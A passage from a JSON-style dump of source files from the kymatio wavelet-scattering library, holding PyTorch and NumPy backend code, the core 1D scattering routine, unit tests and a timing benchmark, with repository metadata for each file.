record.value.args[0]\n\n x = torch.randn(4, 4, 2)\n x = x.to(device)\n y = x[::2, ::2]\n\n with pytest.raises(RuntimeError) as record:\n backend.fft(y)\n assert 'must be contiguous' in record.value.args[0]\n\n\nclass TestBackendUtils:\n @pytest.mark.parametrize('backend', backends)\n def test_concatenate(self, backend):\n x = torch.randn(3, 6, 6)\n y = torch.randn(3, 6, 6)\n z = torch.randn(3, 6, 6)\n\n w = backend.concatenate((x, y, z))\n\n assert w.shape == (x.shape[0],) + (3,) + (x.shape[-2:])\n assert np.allclose(w[:, 0, ...], x)\n assert np.allclose(w[:, 1, ...], y)\n assert np.allclose(w[:, 2, ...], z)\n\n\nclass TestScatteringTorch2D:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Scattering2D(self, backend_device):\n backend, device = backend_device\n\n test_data_dir = os.path.dirname(__file__)\n with open(os.path.join(test_data_dir, 'test_data_2d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = torch.from_numpy(data['x'])\n S = torch.from_numpy(data['Sx'])\n J = data['J']\n pre_pad = data['pre_pad']\n\n M = x.shape[2]\n N = x.shape[3]\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n backend=backend, frontend='torch')\n Sg = []\n x = x.to(device)\n scattering.to(device)\n S = S.to(device)\n Sg = scattering(x)\n assert torch.allclose(Sg, S)\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n max_order=1, frontend='torch',\n backend=backend)\n scattering.to(device)\n\n S1x = scattering(x)\n assert torch.allclose(S1x, S[..., :S1x.shape[-3], :, :])\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, backend):\n if backend.name.endswith('_skcuda'):\n scattering = Scattering2D(3, shape=(32, 32), backend=backend,\n frontend='torch')\n\n x = torch.rand(32, 32)\n\n with pytest.raises(TypeError) as ve:\n Sg = scattering(x)\n assert 'CUDA' in ve.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_batch_shape_agnostic(self, backend_device):\n backend, device = backend_device\n\n J = 3\n L = 8\n shape = (32, 32)\n\n shape_ds = tuple(n // (2 ** J) for n in shape)\n\n S = Scattering2D(J, shape, L, backend=backend, frontend='torch')\n\n with pytest.raises(RuntimeError) as ve:\n S(torch.zeros(()))\n assert 'at least two' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n S(torch.zeros((32, )))\n assert 'at least two' in ve.value.args[0]\n\n x = torch.zeros(shape)\n\n x = x.to(device)\n S.to(device)\n\n Sx = S(x)\n\n assert len(Sx.shape) == 3\n assert Sx.shape[-2:] == shape_ds\n\n n_coeffs = Sx.shape[-3]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2, 2) + shape,\n (2, 2, 2) + shape)\n\n for test_shape in test_shapes:\n x = torch.zeros(test_shape)\n\n x = x.to(device)\n\n Sx = S(x)\n\n assert len(Sx.shape) == len(test_shape) + 1\n assert Sx.shape[-2:] == shape_ds\n assert Sx.shape[-3] == n_coeffs\n assert Sx.shape[:-3] == test_shape[:-2]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_scattering2d_errors(self, backend_device):\n backend, device = backend_device\n\n S = Scattering2D(3, (32, 32), backend=backend, frontend='torch')\n\n S.to(device)\n\n with pytest.raises(TypeError) as record:\n S(None)\n assert 'input should be' in record.value.args[0]\n\n x = torch.randn(4,4)\n y = x[::2,::2]\n\n with pytest.raises(RuntimeError) as record:\n S(y)\n assert 'must be contiguous' in record.value.args[0]\n\n x = torch.randn(31, 31)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Tensor must be of spatial size' in record.value.args[0]\n\n S = Scattering2D(3, (32, 32), pre_pad=True, backend=backend,\n frontend='torch')\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Padded tensor must be of spatial size' in record.value.args[0]\n\n x = torch.randn(8,8)\n S = Scattering2D(2, (8, 8), backend=backend, frontend='torch')\n\n x = x.to(device)\n S = S.to(device)\n if not (device == 'cpu' and backend.name.endswith('_skcuda')):\n y = S(x)\n assert x.device == y.device\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_input_size_agnostic(self, backend_device):\n backend, device = backend_device\n\n for N in [31, 32, 33]:\n for J in [1, 2, 4]:\n scattering = Scattering2D(J, shape=(N, N), backend=backend,\n frontend='torch')\n x = torch.zeros(3, 3, N, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n scattering = Scattering2D(J, shape=(N, N), pre_pad=True,\n backend=backend, frontend='torch')\n x = torch.zeros(3, 3, scattering.M_padded, scattering.N_padded)\n\n x = x.to(device)\n scattering.to(device)\n\n N = 32\n J = 5\n scattering = Scattering2D(J, shape=(N, N), backend=backend,\n frontend='torch')\n x = torch.zeros(3, 3, N, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n assert S.shape[-2:] == (1, 1)\n\n N = 32\n J = 5\n scattering = Scattering2D(J, shape=(N+5, N), backend=backend,\n frontend='torch')\n x = torch.zeros(3, 3, N+5, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n assert S.shape[-2:] == (1, 1)\n\n def test_inputs(self):\n fake_backend = namedtuple('backend', ['name',])\n fake_backend.name = 'fake'\n\n with pytest.raises(ImportError) as ve:\n scattering = Scattering2D(2, shape=(10, 10), frontend='torch',\n backend=fake_backend)\n assert 'not supported' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering2D(10, shape=(10, 10), frontend='torch')\n assert 'smallest dimension' in ve.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_gradients(self, backend_device):\n backend, device = backend_device\n\n if backend.name.endswith('_skcuda'):\n pytest.skip('The gradients are currently not implemented with '\n 'the skcuda backend.')\n else:\n scattering = Scattering2D(2, shape=(8, 8), backend=backend,\n frontend='torch').double().to(device)\n x = torch.rand(2, 1, 8, 8).double().to(device).requires_grad_()\n gradcheck(scattering, x, nondet_tol=1e-5)\n"
},
{
"alpha_fraction": 0.6014492511749268,
"alphanum_fraction": 0.6217391490936279,
"avg_line_length": 25.538461685180664,
"blob_id": "477171dbe73688130bd9c2aac6edd38b310ecaae",
"content_id": "a1f3adab4fce5d2d3f4d3fab04256b58cf708a18",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 26,
"path": "/tests/general/test_torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport pytest\nfrom kymatio.backend.torch_backend import ModulusStable, modulus\n\n\ndef test_modulus(random_state=42):\n \"\"\"\n Tests the stability and differentiability of modulus\n \"\"\"\n\n x = torch.randn(100, 4, 128, 2, requires_grad=True)\n x_grad = x.clone()\n x_abs = modulus(x)\n\n x_grad[..., 0] = x[..., 0] / x_abs\n x_grad[..., 1] = x[..., 1] / x_abs\n\n class FakeContext:\n def save_for_backward(self, *args):\n self.saved_tensors = args\n\n ctx = FakeContext()\n y = ModulusStable.forward(ctx, x)\n y_grad = torch.ones_like(y)\n x_grad_manual = ModulusStable.backward(ctx, y_grad)\n assert torch.allclose(x_grad_manual, x_grad)\n"
},
{
"alpha_fraction": 0.42900997400283813,
"alphanum_fraction": 0.4673829674720764,
"avg_line_length": 26.723403930664062,
"blob_id": "1ffd4c1367aae8681f8ca4360f3f9e64889e466a",
"content_id": "b9f7a135eeabe4ee0687d5c2f7cf3c6c76dd0c50",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1303,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 47,
"path": "/benchmarks/benchmarks/scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport kymatio.scattering2d.backend as backend\nfrom kymatio import Scattering2D\n\nclass BenchmarkScattering2D:\n params = [\n [\n { # MNIST-like. 32x32, 2 scales, 8 orientations\n \"J\": 2,\n \"shape\": (32, 32),\n \"L\": 8,\n },\n { # ImageNet-like. 224x224, 3 scales, 8 orientations\n \"J\": 3,\n \"shape\": (224, 224),\n \"L\": 8,\n },\n { # A case with many scales (J=7) and few orientations (L=2)\n \"J\": 7,\n \"shape\": (224, 224),\n \"L\": 2,\n },\n ],\n [\n 32,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n n_channels = 1\n scattering = Scattering2D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n n_channels,\n sc_params[\"shape\"][0], sc_params[\"shape\"][1],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n Scattering2D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.5396155714988708,
"alphanum_fraction": 0.5457102656364441,
"avg_line_length": 23.802326202392578,
"blob_id": "061d2cd36795747f494f451eb6e5fc7e0837471c",
"content_id": "af08e3edc95716fc8cfee5b8b97563dd97819eb6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2133,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 86,
"path": "/kymatio/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\ndef input_checks(x):\n if x is None:\n raise TypeError('The input should be not empty.')\n\n\ndef modulus(x):\n \"\"\"\n This function implements a modulus transform for complex numbers.\n\n Usage\n -----\n x_mod = modulus(x)\n\n Parameters\n ---------\n x: input complex tensor.\n\n Returns\n -------\n output: a real tensor equal to the modulus of x.\n\n \"\"\"\n return np.abs(x)\n\n\ndef _is_complex(x):\n return (x.dtype == np.complex64) or (x.dtype == np.complex128)\n\n\ndef _is_real(x):\n return (x.dtype == np.float32) or (x.dtype == np.float64)\n\n\ndef cdgmm(A, B, inplace=False):\n \"\"\"\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : tensor\n A is a complex tensor of size (B, C, M, N, 2)\n B : tensor\n B is a complex tensor of size (M, N) or real tensor of (M, N)\n inplace : boolean, optional\n if set to True, all the operations are performed inplace\n\n Returns\n -------\n C : tensor\n output tensor of size (B, C, M, N, 2) such that:\n C[b, c, m, n, :] = A[b, c, m, n, :] * B[m, n, :]\n\n \"\"\"\n\n if not _is_complex(A):\n raise TypeError('The first input must be complex.')\n\n if A.shape[-len(B.shape):] != B.shape[:]:\n raise RuntimeError('The inputs are not compatible for '\n 'multiplication.')\n\n if not _is_complex(B) and not _is_real(B):\n raise TypeError('The second input must be complex or real.')\n\n if inplace:\n return np.multiply(A, B, out=A)\n else:\n return A * B\n\n\ndef real(x):\n \"\"\"Real part of complex tensor\n Takes the real part of a complex tensor, where the last axis corresponds\n to the real and imaginary parts.\n Parameters\n ----------\n x : tensor\n A complex tensor (that is, whose last dimension is equal to 2).\n Returns\n -------\n x_real : tensor\n The tensor x[..., 0] which is interpreted as the real part of x.\n \"\"\"\n return np.real(x)\n"
},
{
"alpha_fraction": 0.6290697455406189,
"alphanum_fraction": 0.637403130531311,
"avg_line_length": 32.07692337036133,
"blob_id": "cfb0bc4719a959ee8dd9f90da865de9508683019",
"content_id": "5f2bc8910efd5aee4ac48d76fbd1ddcea3a787d6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5160,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 156,
"path": "/kymatio/scattering1d/backend/torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Joakim Anden, Mathieu Andreux\n\nimport torch\nimport torch.nn.functional as F\n\nfrom collections import namedtuple\nfrom packaging import version\n\nBACKEND_NAME = 'torch'\n\nfrom ...backend.torch_backend import _is_complex, Modulus, concatenate, type_checks, cdgmm, real\nfrom ...backend.base_backend import FFT\n\ndef subsample_fourier(x, k):\n \"\"\"Subsampling in the Fourier domain\n\n Subsampling in the temporal domain amounts to periodization in the Fourier\n domain, so the input is periodized according to the subsampling factor.\n\n Parameters\n ----------\n x : tensor\n Input tensor with at least 3 dimensions, where the next to last\n corresponds to the frequency index in the standard PyTorch FFT\n ordering. The length of this dimension should be a power of 2 to\n avoid errors. The last dimension should represent the real and\n imaginary parts of the Fourier transform.\n k : int\n The subsampling factor.\n\n Returns\n -------\n res : tensor\n The input tensor periodized along the next to last axis to yield a\n tensor of size x.shape[-2] // k along that dimension.\n \"\"\"\n if not _is_complex(x):\n raise TypeError('The input should be complex.')\n\n N = x.shape[-2]\n res = x.view(x.shape[:-2] + (k, N // k, 2)).mean(dim=-3)\n return res\n\ndef pad_1d(x, pad_left, pad_right, mode='constant', value=0.):\n \"\"\"Pad real 1D tensors\n\n 1D implementation of the padding function for real PyTorch tensors.\n\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n mode : string, optional\n Padding mode. Options include 'constant' and 'reflect'. See the\n PyTorch API for other options. Defaults to 'constant'.\n value : float, optional\n If mode == 'constant', value to input within the padding. Defaults to\n 0.\n\n Returns\n -------\n res : tensor\n The tensor passed along the third dimension.\n \"\"\"\n if (pad_left >= x.shape[-1]) or (pad_right >= x.shape[-1]):\n if mode == 'reflect':\n raise ValueError('Indefinite padding size (larger than tensor).')\n res = F.pad(x.unsqueeze(2),\n (pad_left, pad_right, 0, 0),\n mode=mode, value=value).squeeze(2)\n return res\n\ndef pad(x, pad_left=0, pad_right=0, to_complex=True):\n \"\"\"Pad real 1D tensors and map to complex\n\n Padding which allows to simultaneously pad in a reflection fashion and map\n to complex if necessary.\n\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n to_complex : boolean, optional\n Whether to map the resulting padded tensor to a complex type (seen\n as a real number). Defaults to True.\n\n Returns\n -------\n output : tensor\n A padded signal, possibly transformed into a four-dimensional tensor\n with the last axis of size 2 if to_complex is True (this axis\n corresponds to the real and imaginary parts).\n \"\"\"\n output = pad_1d(x, pad_left, pad_right, mode='reflect')\n if to_complex:\n output = torch.stack((output, torch.zeros_like(output)), dim=-1)\n return output\n\ndef unpad(x, i0, i1):\n \"\"\"Unpad real 1D tensor\n\n Slices the input tensor at indices between i0 and i1 along the last axis.\n\n Parameters\n ----------\n x : tensor\n Input tensor with least one axis.\n i0 : int\n Start of original signal before padding.\n i1 : int\n End of original signal before padding.\n\n Returns\n -------\n x_unpadded : tensor\n The tensor x[..., i0:i1].\n \"\"\"\n return x[..., i0:i1]\n\nif version.parse(torch.__version__) >= version.parse('1.8'):\n fft = FFT(lambda x: torch.view_as_real(torch.fft.fft(torch.view_as_complex(x))),\n lambda x: torch.view_as_real(torch.fft.ifft(torch.view_as_complex(x))),\n lambda x: torch.fft.ifft(torch.view_as_complex(x)).real, type_checks)\nelse:\n fft = FFT(lambda x: torch.fft(x, 1, normalized=False),\n lambda x: torch.ifft(x, 1, normalized=False),\n lambda x: torch.irfft(x, 1, normalized=False, onesided=False),\n type_checks)\n\n\nbackend = namedtuple('backend', ['name', 'modulus_complex', 'subsample_fourier', 'real', 'unpad', 'fft', 'concatenate'])\nbackend.name = 'torch'\nbackend.version = torch.__version__\nbackend.modulus_complex = Modulus()\nbackend.subsample_fourier = subsample_fourier\nbackend.real = real\nbackend.unpad = unpad\nbackend.cdgmm = cdgmm\nbackend.pad = pad\nbackend.pad_1d = pad_1d\nbackend.fft = fft\nbackend.concatenate = lambda x: concatenate(x, -2)\n"
},
{
"alpha_fraction": 0.49189919233322144,
"alphanum_fraction": 0.5220522284507751,
"avg_line_length": 34.45744705200195,
"blob_id": "ea2c36cff65ccf342a00c7d7014b483e6eb3112f",
"content_id": "c3a6c629f651223c8be9436d0af568f84c792fb8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6666,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 188,
"path": "/kymatio/scattering1d/core/scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\n\ndef scattering1d(x, pad, unpad, backend, J, psi1, psi2, phi, pad_left=0,\n pad_right=0, ind_start=None, ind_end=None, oversampling=0,\n max_order=2, average=True, size_scattering=(0, 0, 0),\n vectorize=False, out_type='array'):\n \"\"\"\n Main function implementing the 1-D scattering transform.\n\n Parameters\n ----------\n x : Tensor\n a torch Tensor of size `(B, 1, T)` where `T` is the temporal size\n psi1 : dictionary\n a dictionary of filters (in the Fourier domain), with keys (`j`, `q`).\n `j` corresponds to the downsampling factor for\n :math:`x \\\\ast psi1[(j, q)]``, and `q` corresponds to a pitch class\n (chroma).\n * psi1[(j, n)] is itself a dictionary, with keys corresponding to the\n dilation factors: psi1[(j, n)][j2] corresponds to a support of size\n :math:`2^{J_\\\\text{max} - j_2}`, where :math:`J_\\\\text{max}` has been\n defined a priori (`J_max = size` of the padding support of the input)\n * psi1[(j, n)] only has real values;\n the tensors are complex so that broadcasting applies\n psi2 : dictionary\n a dictionary of filters, with keys (j2, n2). Same remarks as for psi1\n phi : dictionary\n a dictionary of filters of scale :math:`2^J` with keys (`j`)\n where :math:`2^j` is the downsampling factor.\n The array `phi[j]` is a real-valued filter.\n J : int\n scale of the scattering\n pad_left : int, optional\n how much to pad the signal on the left. Defaults to `0`\n pad_right : int, optional\n how much to pad the signal on the right. Defaults to `0`\n ind_start : dictionary of ints, optional\n indices to truncate the signal to recover only the\n parts which correspond to the actual signal after padding and\n downsampling. Defaults to None\n ind_end : dictionary of ints, optional\n See description of ind_start\n oversampling : int, optional\n how much to oversample the scattering (with respect to :math:`2^J`):\n the higher, the larger the resulting scattering\n tensor along time. Defaults to `0`\n order2 : boolean, optional\n Whether to compute the 2nd order or not. Defaults to `False`.\n average_U1 : boolean, optional\n whether to average the first order vector. Defaults to `True`\n size_scattering : tuple\n Contains the number of channels of the scattering, precomputed for\n speed-up. Defaults to `(0, 0, 0)`.\n vectorize : boolean, optional\n whether to return a dictionary or a tensor. Defaults to False.\n\n \"\"\"\n subsample_fourier = backend.subsample_fourier\n modulus_complex = backend.modulus_complex\n real = backend.real\n fft = backend.fft\n cdgmm = backend.cdgmm\n concatenate = backend.concatenate\n\n\n # S is simply a dictionary if we do not perform the averaging...\n batch_size = x.shape[0]\n kJ = max(J - oversampling, 0)\n temporal_size = ind_end[kJ] - ind_start[kJ]\n out_S_0, out_S_1, out_S_2 = [], [], []\n\n # pad to a dyadic size and make it complex\n U_0 = pad(x, pad_left=pad_left, pad_right=pad_right)\n\n # compute the Fourier transform\n U_0_hat = fft(U_0, 'C2C')\n\n # Get S0\n k0 = max(J - oversampling, 0)\n\n if average:\n S_0_c = cdgmm(U_0_hat, phi[0])\n S_0_hat = subsample_fourier(S_0_c, 2**k0)\n S_0_r = fft(S_0_hat, 'C2R', inverse=True)\n\n S_0 = unpad(S_0_r, ind_start[k0], ind_end[k0])\n else:\n S_0 = x\n\n out_S_0.append({'coef': S_0,\n 'j': (),\n 'n': ()})\n\n # First order:\n for n1 in range(len(psi1)):\n # Convolution + downsampling\n j1 = psi1[n1]['j']\n\n k1 = max(j1 - oversampling, 0)\n\n assert psi1[n1]['xi'] < 0.5 / (2**k1)\n\n U_1_c = cdgmm(U_0_hat, psi1[n1][0])\n U_1_hat = subsample_fourier(U_1_c, 2**k1)\n U_1_c = fft(U_1_hat, 'C2C', inverse=True)\n\n # Take the modulus\n U_1_m = modulus_complex(U_1_c)\n\n if average or max_order > 1:\n U_1_hat = fft(U_1_m, 'C2C')\n\n if average:\n # Convolve with phi_J\n k1_J = max(J - k1 - oversampling, 0)\n\n S_1_c = cdgmm(U_1_hat, phi[k1])\n S_1_hat = subsample_fourier(S_1_c, 2**k1_J)\n S_1_r = fft(S_1_hat, 'C2R', inverse=True)\n\n S_1 = unpad(S_1_r, ind_start[k1_J + k1], ind_end[k1_J + k1])\n else:\n # just take the real value and unpad\n U_1_r = real(U_1_m)\n\n S_1 = unpad(U_1_r, ind_start[k1], ind_end[k1])\n\n out_S_1.append({'coef': S_1,\n 'j': (j1,),\n 'n': (n1,)})\n\n if max_order == 2:\n # 2nd order\n for n2 in range(len(psi2)):\n j2 = psi2[n2]['j']\n\n if j2 > j1:\n assert psi2[n2]['xi'] < psi1[n1]['xi']\n\n # convolution + downsampling\n k2 = max(j2 - k1 - oversampling, 0)\n\n U_2_c = cdgmm(U_1_hat, psi2[n2][k1])\n U_2_hat = subsample_fourier(U_2_c, 2**k2)\n # take the modulus\n U_2_c = fft(U_2_hat, 'C2C', inverse=True)\n\n U_2_m = modulus_complex(U_2_c)\n\n if average:\n U_2_hat = fft(U_2_m, 'C2C')\n\n # Convolve with phi_J\n k2_J = max(J - k2 - k1 - oversampling, 0)\n\n S_2_c = cdgmm(U_2_hat, phi[k1 + k2])\n S_2_hat = subsample_fourier(S_2_c, 2**k2_J)\n S_2_r = fft(S_2_hat, 'C2R', inverse=True)\n\n S_2 = unpad(S_2_r, ind_start[k1 + k2 + k2_J], ind_end[k1 + k2 + k2_J])\n else:\n # just take the real value and unpad\n U_2_r = real(U_2_m)\n S_2 = unpad(U_2_r, ind_start[k1 + k2], ind_end[k1 + k2])\n\n out_S_2.append({'coef': S_2,\n 'j': (j1, j2),\n 'n': (n1, n2)})\n\n out_S = []\n out_S.extend(out_S_0)\n out_S.extend(out_S_1)\n out_S.extend(out_S_2)\n\n if out_type == 'array' and vectorize:\n out_S = concatenate([x['coef'] for x in out_S])\n elif out_type == 'array' and not vectorize:\n out_S = {x['n']: x['coef'] for x in out_S}\n elif out_type == 'list':\n # NOTE: This overrides the vectorize flag.\n for x in out_S:\n x.pop('n')\n\n return out_S\n\n__all__ = ['scattering1d']\n"
},
{
"alpha_fraction": 0.5609991550445557,
"alphanum_fraction": 0.580366849899292,
"avg_line_length": 31.245136260986328,
"blob_id": "a00708b781387cb75ba3b4407a1e69dcfc55a4d7",
"content_id": "1c9636f8389b2bf087753a13d42e978cd22ab744",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16574,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 514,
"path": "/tests/scattering1d/test_torch_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import pytest\nimport torch\nfrom kymatio import Scattering1D\nimport math\nimport os\nimport io\nimport numpy as np\n\n\nbackends = []\nskcuda_available = False\ntry:\n if torch.cuda.is_available():\n from skcuda import cublas\n import cupy\n skcuda_available = True\nexcept:\n Warning('torch_skcuda backend not available.')\n\nif skcuda_available:\n from kymatio.scattering1d.backend.torch_skcuda_backend import backend\n backends.append(backend)\n\nfrom kymatio.scattering1d.backend.torch_backend import backend\nbackends.append(backend)\n\n\nif torch.cuda.is_available():\n devices = ['cuda', 'cpu']\nelse:\n devices = ['cpu']\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_simple_scatterings(device, backend, random_state=42):\n \"\"\"\n Checks the behaviour of the scattering on simple signals\n (zero, constant, pure cosine)\n \"\"\"\n\n rng = np.random.RandomState(random_state)\n J = 6\n Q = 8\n T = 2**9\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').to(device)\n return\n\n # zero signal\n x0 = torch.zeros(2, T).to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s = scattering(x0)\n assert \"CPU\" in ve.value.args[0]\n return\n s = scattering(x0)\n\n # check that s is zero!\n assert torch.max(torch.abs(s)) < 1e-7\n\n # constant signal\n x1 = rng.randn(1)[0] * torch.ones(1, T).to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n s1 = scattering(x1)\n\n # check that all orders above 1 are 0\n assert torch.max(torch.abs(s1[:, 1:])) < 1e-7\n\n # sinusoid scattering\n meta = scattering.meta()\n for _ in range(3):\n k = rng.randint(1, T // 2, 1)[0]\n x2 = torch.cos(2 * math.pi * float(k) * torch.arange(0, T, dtype=torch.float32) / float(T))\n x2 = x2.unsqueeze(0).to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n s2 = scattering(x2)\n\n assert(s2[:,torch.from_numpy(meta['order']) != 1,:].abs().max() < 1e-2)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_sample_scattering(device, backend):\n \"\"\"\n Applies scattering on a stored signal to make sure its output agrees with\n a previously calculated version.\n \"\"\"\n test_data_dir = os.path.dirname(__file__)\n\n with open(os.path.join(test_data_dir, 'test_data_1d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n\n x = torch.from_numpy(data['x']).to(device)\n J = data['J']\n Q = data['Q']\n Sx0 = torch.from_numpy(data['Sx']).to(device)\n\n T = x.shape[-1]\n\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n Sx = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n return\n\n Sx = scattering(x)\n assert torch.allclose(Sx, Sx0)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_computation_Ux(backend, device, random_state=42):\n \"\"\"\n Checks the computation of the U transform (no averaging for 1st order)\n \"\"\"\n rng = np.random.RandomState(random_state)\n J = 6\n Q = 8\n T = 2**12\n scattering = Scattering1D(J, T, Q, average=False,\n max_order=1, vectorize=False, frontend='torch', backend=backend).to(device)\n # random signal\n x = torch.from_numpy(rng.randn(1, T)).float().to(device)\n\n if not backend.name.endswith('skcuda') or device != 'cpu':\n s = scattering(x)\n\n # check that the keys in s correspond to the order 0 and second order\n for k in range(len(scattering.psi1_f)):\n assert (k,) in s.keys()\n for k in s.keys():\n if k is not ():\n assert k[0] < len(scattering.psi1_f)\n else:\n assert True\n\n scattering.max_order = 2\n\n s = scattering(x)\n\n count = 1\n for k1, filt1 in enumerate(scattering.psi1_f):\n assert (k1,) in s.keys()\n count += 1\n for k2, filt2 in enumerate(scattering.psi2_f):\n if filt2['j'] > filt1['j']:\n assert (k1, k2) in s.keys()\n count += 1\n\n assert count == len(s)\n\n with pytest.raises(ValueError) as ve:\n scattering.vectorize = True\n scattering(x)\n assert \"mutually incompatible\" in ve.value.args[0]\n\n\n# Technical tests\[email protected](\"backend\", backends)\ndef test_scattering_GPU_CPU(backend, random_state=42):\n \"\"\"\n This function tests whether the CPU computations are equivalent to\n the GPU ones\n \"\"\"\n if torch.cuda.is_available() and not backend.name.endswith('_skcuda'):\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n # build the scattering\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').cpu()\n\n x = torch.randn(2, T)\n s_cpu = scattering(x)\n\n scattering = scattering.cuda()\n x_gpu = x.clone().cuda()\n s_gpu = scattering(x_gpu).cpu()\n # compute the distance\n\n Warning('Tolerance has been slightly lowered here...')\n assert torch.allclose(s_cpu, s_gpu, atol=1e-7)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_coordinates(device, backend, random_state=42):\n \"\"\"\n Tests whether the coordinates correspond to the actual values (obtained\n with Scattering1d.meta()), and with the vectorization\n \"\"\"\n\n torch.manual_seed(random_state)\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, max_order=2, backend=backend, frontend='torch')\n\n x = torch.randn(2, T)\n\n scattering.to(device)\n x = x.to(device)\n\n for max_order in [1, 2]:\n scattering.max_order = max_order\n\n scattering.vectorize = False\n\n if backend.name.endswith('skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s_dico = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n else:\n s_dico = scattering(x)\n s_dico = {k: s_dico[k].data for k in s_dico.keys()}\n scattering.vectorize = True\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s_vec = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n else:\n s_vec = scattering(x)\n s_dico = {k: s_dico[k].cpu() for k in s_dico.keys()}\n s_vec = s_vec.cpu()\n\n meta = scattering.meta()\n\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n assert len(s_dico) == s_vec.shape[1]\n\n for cc in range(s_vec.shape[1]):\n k = meta['key'][cc]\n assert torch.allclose(s_vec[:, cc], torch.squeeze(s_dico[k]))\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_precompute_size_scattering(device, backend, random_state=42):\n \"\"\"\n Tests that precompute_size_scattering computes a size which corresponds\n to the actual scattering computed\n \"\"\"\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, vectorize=False, backend=backend, frontend='torch')\n\n x = torch.randn(2, T)\n\n scattering.to(device)\n x = x.to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n for max_order in [1, 2]:\n scattering.max_order = max_order\n s_dico = 